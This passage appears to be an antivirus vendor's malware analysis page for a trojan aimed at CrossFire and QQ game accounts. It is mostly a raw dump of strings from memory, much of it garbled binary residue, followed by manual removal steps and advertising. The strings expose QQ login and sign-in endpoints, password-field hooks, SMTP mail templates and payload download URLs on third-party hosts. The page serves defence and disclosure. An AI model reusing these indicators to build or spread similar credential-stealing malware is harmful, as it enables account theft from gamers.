&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Host: qiandao.qun.qq.com
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一支穿云箭 千军万马来相见。
08 08 08 50
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/cap_union_verify_new?random=1480258509499
&pt_randsalt=0&u1=http://cf.qq.com&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
http2://ossweb
hXXp://ossweb
"img":"http2(.*?).jpg"
"hXXp://(.*?)":{
"~ /1~!<
fD.nn'1r?
.KM8'
$&%cw]
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.cn
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 08:00:00
function timea(){var d,s;d=new Date();d.setTime('
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
"sMsg":"MODULE OK"
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
\gzip.dll
`.data
gzip.pdb
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://cfzhushou.com/pay.html
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
game.qq.com
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://apps.game.qq.com&style=34
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
o%%co
``PBi %c
<\-M}*0_
{56FDF344-FD6D-11d0-958A-006097C9A090}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
Report
themepassword
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
LocationURL
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
1970-01-01 00:00:00
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
']?(.*?)[#
onkeydown|
onkeyup|
onkeypress|
wA{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
text|password|file
?)-D%f`
location.reload()
window.location.href="
{25336920-03F9-11CF-8FD0-00AA00686F13}
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
document.all.retjs.innerText=
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
type=password
[password]
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
user.qzone.qq.com
mail.qq.com
onkeyup
type='password'
type="password"
, 1, , ,
var jie = document.createStyleSheet();jie.addRule('html','
').value="
document.getElementById('
SysShadow.Menu
Microsoft.XMLDOM
14:00~16:00
12:00-19:00
1.2.18
%*.*f
MSWHEEL_ROLLMSG
RASAPI32.dll
MSVFW32.dll
AVIFIL32.dll
GetKeyboardState
oledlg.dll
WSOCK32.dll
InternetCanonicalizeUrlA
msscript.ocx
VVV.dywt.com.cn
USER32.DLL
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
its:%s::%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
.PAVCOleException@@
.PAVCOleDispatchException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
.FNNNNNNNNNNNNNNV
.FNNNNNNNNNNNN
.CNNNB
.CNNd
ÝDDDDDDQC
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
1.0.15.507
T%Program Files%\NamuADLook.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
2.6.0.0
VVV.cfzhushou.com

%original file name%.exe_1908_rwx_017A0000_00013000:

.text
`.rdata
@.data
.rsrc
@.reloc
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
<fd:%d>
%c%c%c%c%c%c%c%c%c%c
MSVCRT.dll
KERNEL32.dll
zlib1.dll
!"#$%&'()* ,-./012
DLL support by Alessandro Iacopetti & Gilles Vollant

TxService.exe_2924:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
Bv=kAv.SCv
CF_Helper.dll
wininet.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
@.reloc
HTTP/1.1
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
ShellExecuteA
SHELL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetProcessHeap
GetCPInfo
zcÁ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
7.84888<8@8
6 696?6{6
14686<6@6
5 5(50585
? ?$?,?@?`?
>$>0>4>8><>
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
crossfire.exe
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
C:\TxService.exe
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
T%Program Files%\NamuADLook.dll
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0

%original file name%.exe_1908_rwx_10001000_00033000:

f9z.vk
@Microsoft.XMLDOM
dwmapi.dll
Riched20.dll
Riched32.dll
{00000000-0000-0000-C000-000000000046}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
kernel32.dll
ole32.dll
gdiplus.dll
GdiPlus.dll
gdi32.dll
user32.dll
Advapi32.dll
advapi32.dll
User32.dll
ntdll.dll
Ole32.dll
shell32.dll
atl.dll
program internal error number is %d.
:"%s"
:"%s".
GetProcessHeap
&..0`%X
.text
`.rdata
@.data
.rsrc
.reloc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    TxService.exe:2924

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Program Files%\sesvcs_963_56089.exe (503 bytes)
    %Program Files%\23.txt (27530 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KEZ8B515.txt (112 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\01[1].txt (24010 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\NamuADLook[1].dll (16650 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\26993501420171281319931[1].htm (45330 bytes)
    C:\CF_Helper.dll (202 bytes)
    %Program Files%\NamuADLook.dll (20518 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\33[1].txt (40 bytes)
    C:\TxService.exe (1670 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\20D65GOU.txt (91 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\2672760322016102115848934[1].htm (97343 bytes)
    C:\exdui.dll (53 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now